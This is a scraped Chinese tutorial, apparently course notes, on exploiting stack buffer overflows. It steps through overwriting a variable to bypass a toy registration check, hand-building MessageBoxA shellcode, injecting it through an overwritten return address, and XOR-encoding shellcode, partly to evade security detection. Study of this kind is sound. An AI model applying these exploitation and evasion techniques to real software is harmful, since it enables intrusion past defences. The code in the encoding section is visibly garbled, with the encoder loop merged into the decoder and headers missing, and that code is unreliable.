漏洞利用篇(上)

您所在的位置:网站首页 精准杀一码永不出错 漏洞利用篇(上)

漏洞利用篇(上)

2024-01-15 10:25| 来源: 网络整理| 查看: 265

文章目录 漏洞利用概念及示例漏洞利用概念漏洞利用手段shellshellcode 漏洞利用的核心Exploit的结构 覆盖临接变量示例verify函数的缓冲区漏洞利用:覆盖临接变量 Shellcode代码植入示例漏洞利用:代码植入编写shellcode用汇编语言编写MessageBoxA需要三个步骤 Shellcode编写Shellcode编写的难点简单编写Shellcode的方法第一步:用c语言书写要执行的Shellcode第二步:换成对应的汇编代码第三步:根据汇编代码,找到对应地址中的机器码 编写输出“hello world”的Shellcode Shellcode编码Shellcode编码的必要性Shellcode编码方法异或编码编码程序解码程序获取代码当前指令地址完整的shellcode代码

审核未通过,分为上下两篇

漏洞利用概念及示例 漏洞利用概念

漏洞利用(exploit)是指针对已有的漏洞,根据漏洞的类型和特点而采取相应的技术方案,进行尝试性或实质性的攻击。Exploit 的英文意思就是利用,它在黑客眼里就是漏洞利用。有漏洞不一定就有Exploit(利用),但是有Exploit就肯定有漏洞。

假设,刚刚发现了一个Minishare的0Day漏洞。Minishare是一款文件共享软件,该0Day漏洞是一个缓冲区溢出漏洞,这个漏洞影响之前的所有版本。当用户向服务器发送的报文长度过大(超过堆栈边界)时就会触发该漏洞。

得到该漏洞后,可以做点什么呢?善意点的,可以对同学或者朋友的电脑搞搞恶作剧,让他的电脑弹出个对话框之类的。恶意的话,可以利用这个漏洞来向目标机器植入木马,窃听用户个人隐私等。

漏洞利用手段

在1996年,Aleph One在Underground发表了著名论文《SMASHING THE STACK FOR FUN AND PROFIT》,其中详细描述了Linux系统中栈的结构和如何利用基于栈的缓冲区溢出。在这篇具有划时代意义的论文中,Aleph One演示了如何向进程中植入一段用于获得shell的代码,并在论文中称这段被植入进程的代码为“shellcode”。

shell

实际上,Shell是一个命令解释器,它解释由用户输入的命令并且把它们送到内核。

shellcode

现在,“shellcode”已经表达的是广义上的植入进程的代码,而不是狭义上的仅仅用来获得shell的代码。

漏洞利用的核心

漏洞利用的核心就是利用程序漏洞去劫持进程的控制权,实现控制流劫持,以便执行植入的shellcode或者达到其它的攻击目的。

当攻击者掌握了被攻击程序的内存错误漏洞后,一般会考虑发起控制流劫持攻击。早期的攻击通常采用代码植入的方式,通过上载一段代码,将控制转向这段代码执行。在栈溢出漏洞的利用过程中,攻击的目的是淹没返回地址,以便劫持进程的控制权,让程序跳转去执行shellcode。

Exploit的结构

要完成攻击,Exploit需要执行shellcode,但Exploit中并不仅是shellcode。

Exploit要达到攻击目标,要做的工作更多,比如对应的触发漏洞、将控制权转移到shellcode一般均不相同,而且他们通常独立于shellcode的代码。能实现特定目标的Exploit的有效载荷,称为Payload。

一个经典的比喻,将漏洞利用过程比作导弹发射的过程:Exploit、payload和shellcode分别是导弹发射装置、导弹和弹头。Exploit是导弹发生装置,针对目标发射导弹(payload);导弹到达目标之后,释放实际危害的弹头(类似shellcode)爆炸;导弹除了弹头之外的其余部分用来实现对目标进行定位追踪、对弹头引爆等功能,在漏洞利用中,对应payload的非shellcode的部分。

Exploit是指利用漏洞进行攻击的动作;Shellcode用来实现具体的功能;Payload除了包含shellcode之外,还需要考虑如何触发漏洞并让系统或者程序去执行shellcode。

覆盖临接变量示例

假设我们已知一个系统的注册机验证过程的漏洞,程序举例如下:

#include #include #define REGCODE "12345678" int verify (char * code){ int flag; char buffer[44]; flag=strcmp(REGCODE, code); strcpy(buffer, code); return flag; } //假设其主程序启动的时候要校验注册码 void main(){ int vFlag=0; char regcode[1024]; FILE *fp; LoadLibrary("user32.dll"); if(!(fp=fopen("reg.txt","rw+"))) exit(0); fscanf(fp,"%s", regcode); vFlag=verify(regcode); if(vFlag) printf("wrong regcode!"); else printf("passed!"); fclose(fp); } verify函数的缓冲区

Verify函数的缓冲区为44个字节,对应的栈帧状态如下图所示:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-TgBEQjmq-1655372162223)(747c7e35dc8f2b52b379c335ba1a9192.png)]

漏洞利用:覆盖临接变量

软件漏洞篇讲栈溢出漏洞时提到覆盖临接变量示例

利用目标:利用溢出覆盖临接变量,实现控制流劫持,完成软件破解。

利用这个漏洞,我们可以破解该软件,让注册码无效。只需要想法淹没flag状态位,使其变为0即可,则只需要设计:buffer(44字节)+1字节(整数0),即在reg.txt中写入45个字节,其中最后1个字节为0。

如果能对reg.txt写入二进制数据,我们利用Ultraedit打开reg.txt,并在该文件中写入

“123412341234123412341234123412341234123412341”。需要将最后1个字节由ASCII-1改为全0。

Shellcode代码植入示例 漏洞利用:代码植入

利用目标:利用溢出覆盖返回地址,转去执行植入的恶意程序。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-5nu3WnvW-1655372162225)(7319a7b7f2de4a656ae4975ee3234d74.png)]

基于上述程序,编写shellcode,完成代码植入

Shellcode往往需要用汇编语言编写,并转换成二进制机器码,其内容和长度经常还会受到很多苛刻限制,故开发和调试的难度很高。

植入代码之前要做大量的调试工作,比如:

弄清楚程序有几个输入点,这些输入将最终会当作哪个函数的第几个参数读入到内存的哪一个区域,哪一个输入会造成栈溢出,在复制到栈区的时候对这些数据有没有额外的限制等;调试之后还要计算函数返回地址距离缓冲区的偏移并淹没之;选择指令的地址, 最终制作出一个有攻击效果的“承载”着shellcode的输入字符串。 编写shellcode

目标:编写一段代码,使其能够淹没返回地址,该返回地址将执行一个MessageBox函数,弹出窗体。

为了能淹没返回地址,需要在reg.txt中至少写入:buffer(44字节)+flag(4字节)+前EBP值(4字节),也就是53—56才是要淹没的地址。让程序弹出一个消息框只需要调用Windows的API函数MessageBox。

MSDN对MessageBox函数的解释如下:

int MessageBox( HWND hWnd, // handle to owner window LPCTSTR lpText, // text in message box LPCTSTR lpCaption, // message box title UINT uType // message box style ); hWnd

消息框所属窗口的句柄,如果为NULL,消息框则不属于任何窗口。

lpText

字符串指针,所指字符串会在消息框中显示。

lpCaption

字符串指针,所指字符串将成为消息框的标题。

uType

消息框的风格(单按钮、多按钮等),NULL代表默认风格。

我们将写出调用这个API的汇编代码,然后翻译成机器代码,用十六进制编辑工具填入reg.txt文件。注意:使用MessageBoxA函数。

用汇编语言编写MessageBoxA需要三个步骤 装载动态链接库user32.dll。MessageBoxA是动态链接库user32.dll的导出函数。虽然大多数有图形化操作界面的程序都已经装载了这个库,但是我们用来实验的consol版并没有默认加载它。在汇编语言中调用这个函数需要获得函数的入口地址。在调用前需要向栈中按从右向左的顺序压入4个参数。为了让植入的机器代码更加简洁明了,我们在实验准备中构造漏洞程序的时候已经人工加载了user32.dll这个库,所以第一步操作不用在汇编语言中考虑。

第一步:获取函数入口地址

获取函数入口地址:MessageBoxA的入口地址可以通过user32.dll在系统中加载的基址和MessageBoxA在库中的偏移相加得到。可以使用VC6.0自带的小工具“Dependency Walker”获得这些信息,如下图user32.dll的基地址为 0x77D10000,MessageBoxA的偏移地址为0x000407EA。基地址加上偏移地址就得到了MessageBoxA函数在内存中的入口地址:0x77D507EA。

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LBUoX7rb-1655372162226)(2c6f87661e80ee833b0b88cc209735fe.png)]

使用代码来获取相关函数地址:在C/C++语言中,GetProcAddress函数检索指定的动态链接库(DLL)中的输出库函数地址。如果函数调用成功,返回值是DLL中的输出函数地址。函数原型如下:

FARPROC GetProcAddress( HMODULE hModule, // DLL 模块句柄 LPCSTR lpProcName // 函数名 ); 参数hModule包含此函数的DLL模块的句柄。LoadLibrary、AfxLoadLibrary或者GetModuleHandle函数可以返回此句柄。参数lpProcName是包含函数名的以NULL结尾的字符串,或者指定函数的序数值。FARPROC是一个4字节指针,指向一个函数的内存地址,GetProcAddress的返回类型就是FARPROC。如果你要存放这个地址,可以声明以一个FARPROC变量来存放。 #include #include int main() { HINSTANCE LibHandle; FARPROC ProcAdd; LibHandle = LoadLibrary("user32"); //获取user32.dll的地址 printf("user32 = 0x%x \n", LibHandle); //获取MessageBoxA的地址 ProcAdd=(FARPROC)GetProcAddress(LibHandle,"MessageBoxA"); printf("MessageBoxA = 0x%x \n", ProcAdd); getchar(); return 0; } //运行代码可以得到入口地址:0x77D507EA

第二步:编写函数调用的汇编代码

编写函数调用的汇编代码:先把字符串“westwest”压入栈区,消息框的文本和标题都显示为“westwest”,只要重复压入指向这个字符串的指针即可;第1个和第4个参数这里都将设置为NULL。

机器代码汇编指令注释33 DBXOR EBX,EBX将EBX的值设置为053PUSH EBX将EBX的值入栈68 77 65 73 74PUSH 74736577将字符串west入栈68 77 65 73 74PUSH 74736577将字符串west入栈8B C4MOV EAX,ESP将栈顶指针存入EAX(栈顶指针的值就是字符串的首地址)53PUSH EBX入栈Messagebox的参数-类型50PUSH EAX入栈Messagebox的参数-标题50PUSH EAX入栈Messagebox的参数-消息53PUSH EBX入栈Messagebox的参数-句柄B8 EA 07 D5 77MOV EAX, 0x77D507EAFF D0CALL EAX调用MessageBoxA函数,注意,每个机器的该函数的入口地址不同,请按实际值写入。

第三步:注入Shellcode代码

得到的shellcode为:33 DB 53 68 77 65 73 74 68 77 65 73 74 8B C4 53 50 50 53 B8 EA 07 D5 77 FF D0。 将这段shellcode写入reg.txt文件,且在返回地址处写buffer的地址。 Buffer的地址可以通过OllyDbg来查看得到,也可以通过VC6的转到反汇编方式来得到:0012FAF0。用nop指令填充空余部分(ASCII值:90)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-4TtRSVBi-1655372162227)(635c4861c2059e67bb283fa34dddf417.png)]

注意:Windows xp下静态 API 的地址是准的,windows XP之后的操作系统版本增加了ASLR 保护机制,地址就不准,就得动态获取了,利用地址定位技术或者通用型Shellcode编写可以解决这个问题。

Shellcode编写 Shellcode编写的难点

由于漏洞发现者在漏洞发现之初并不会给出完整Shellcode,因此掌握Shellcode编写技术就显得尤为重要。但是,要编写Shellcode存在很多难点:

对一些特定字符需要转码。比如,对于strcpy等函数造成的缓冲区溢出,会认为NULL是字符串的终结,所以shellcode中不能有NULL,如果有需要则要进行变通或编码。函数API的定位很困难。比如,在Windows系统下,系统调用多数都是封装在高级API中来调用的,而且不同的Service Pack或版本的操作系统其API都可能有所改动,所以不可能直接调用。因此,需要采用动态的方法获取API地址。 简单编写Shellcode的方法

一种简单的编写Shellcode的方法的步骤如下:

第一步:用c语言书写要执行的Shellcode

使用VC6编写程序如下:

#include #include void main() { MessageBox(NULL,NULL,NULL,0); return; } 第二步:换成对应的汇编代码

利用调试功能,找到其对应的汇编代码:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-qz4j80s9-1655372162228)(a99f990d555c8fbbad47157005d5bf9a.png)]

直接得到的汇编语言通常需要进行再加工。对于push 0而言,可以通过上述的xor ebx ebx之后执行push ebx来实现。

在工程中编写汇编语言如下:

#include #include void main(){ LoadLibrary("user32.dll");//加载user32.dll _asm { xor ebx,ebx push ebx//push 0,push 0的机器代码会出现一个字节的0,对于直接利用需要解决字节为0的问题,因此转换为push ebx push ebx push ebx push ebx mov eax, 77d507eah// 77d507eah是MessageBox函数在系统中的地址 call eax } return; } 第三步:根据汇编代码,找到对应地址中的机器码

在汇编第一行代码处打断点,利用调试定位具体内存中的地址:

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ORsSG4CT-1655372162228)(c58fa397f5aebffcee94d5abdd6a0ef1.png)]

这样,在Memory窗口就可以找到对应的机器码:33 DB 53 53 53 53 B8 EA 07 D5 77 FF D0。

接下来就可以利用这个Shellcode来实现漏洞的利用了,一个VC6测试程序如下:

#include #include char ourshellcode[]="\x33\xDB\x53\x53\x53\x53\xB8\xEA\x07\xD5\x77\xFF\xD0"; void main() { LoadLibrary("user32.dll"); int *ret; ret=(int*)&ret+2;//指向返回地址 (*ret)=(int)ourshellcode; return; } 编写输出“hello world”的Shellcode 4字节存入,硬编码空格是0x20;不足4字节,可以在最后的字节里补空格。“hello world” ASCII码为:\x68\x65\x6C\x6C\x6F\x20\x77\x6F\x72\x6C\x64\x20。入栈的话,需要倒着来;考虑big endian编码,存储顺序也得倒过来。

利用ESP来获取字符串的地址,编写的shellcode代码如下:

_asm { xor ebx,ebx push ebx//push 0 push 20646C72h push 6F77206Fh push 6C6C6568h mov eax, esp push ebx//push 0 push eax push eax push ebx mov eax, 77d507eah// 77d507eah这个是MessageBox函数在系统中的地址 call eax }

提取到的 shellcode 代码为: \x33\xDB\x53\x68\x72\x6C\x64\x20\x68\x6F\x20\x77\x6F\x68\x68\x65\x6C\x6C\x8B\xC4\x53\x50\x50\x53\xB8\xEA\x07\xD5\x77\xFF\xD0

可以使用上述程序实验。

Shellcode编码 Shellcode编码的必要性

Shellcode代码编制过程通常需要进行编码,因为:

字符集的差异。应用程序应用平台的不同,可能的字符集会有差异,限制exploit的稳定性。绕过坏字符。针对某个应用,可能对某些“坏字符”变形或者截断而破坏exploit,比如strcpy函数对NULL字符的不可接纳性,再比如很多应用在某些处理流程中可能会限制0x0D(\r)、0x0A(\n)或者0x20(空格)字符。绕过安全防护检测。有很多安全检测工具是根据漏洞相应的exploit脚本特征做的检测,所以变形exploit在一定程度上可以“免杀”。 Shellcode编码方法

网页Shellcode。对于网页Shellcode,可以采用base64编码。Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,是一种基于64个可打印字符来表示二进制数据的方法。 二进制机器代码。对于二进制Shellcode机器代码的编码,通常采用类似“加壳”思想的手段,采用:

自定义编码(异或编码、计算编码、简单加解密等)的方法完成shellcode的编码;通过精心构造精简干练的解码程序,放在shellcode开始执行的地方,完成shellcode的编解码;当exploit成功时,shellcode顶端的解码程序首先运行,它会在内存中将真正的shellcode还原成原来的样子,然后执行。 异或编码

异或编码是一种简单易用的shellcode编码方法,它的编解码程序非常简单。 但是它也存在很多限制,比如在选取编码字节时,不可与已有字节相同,否则会出现0。

编码程序

编码程序,是独立的。是在生成shellcode的编码阶段使用。将shellcode代码输入后,输出异或后的shellcode编码。

void encoder(char* input, unsigned char key) { int i = 0, len = 0; len = strlen(input); unsigned char * output = (unsigned char *)malloc(len + 1); for (i = 0; i __asm { add eax, 0x14 ; 越过decoder,假设eax对准当前这条指令的地址 xor ecx, ecx decode_loop: mov bl, [eax + ecx] xor bl, 0x44 ;用0x44作为key mov [eax + ecx], bl inc ecx cmp bl, 0x90 ;末尾放一个0x90作为结束符 jne decode_loop } } 获取代码当前指令地址

怎么让eax记录shellcode当前的起始地址?看如下代码。

#include using namespace std; int main(int argc, char const *argv[]) { unsigned int temp; __asm{ call lable; lable: pop eax; mov temp,eax; } cout LoadLibrary("user32.dll"); int *ret; ret=(int*)&ret+2; (*ret)=(int)ourshellcode; return; }


【本文地址】


今日新闻


推荐新闻


CopyRight 2018-2019 办公设备维修网 版权所有 豫ICP备15022753号-3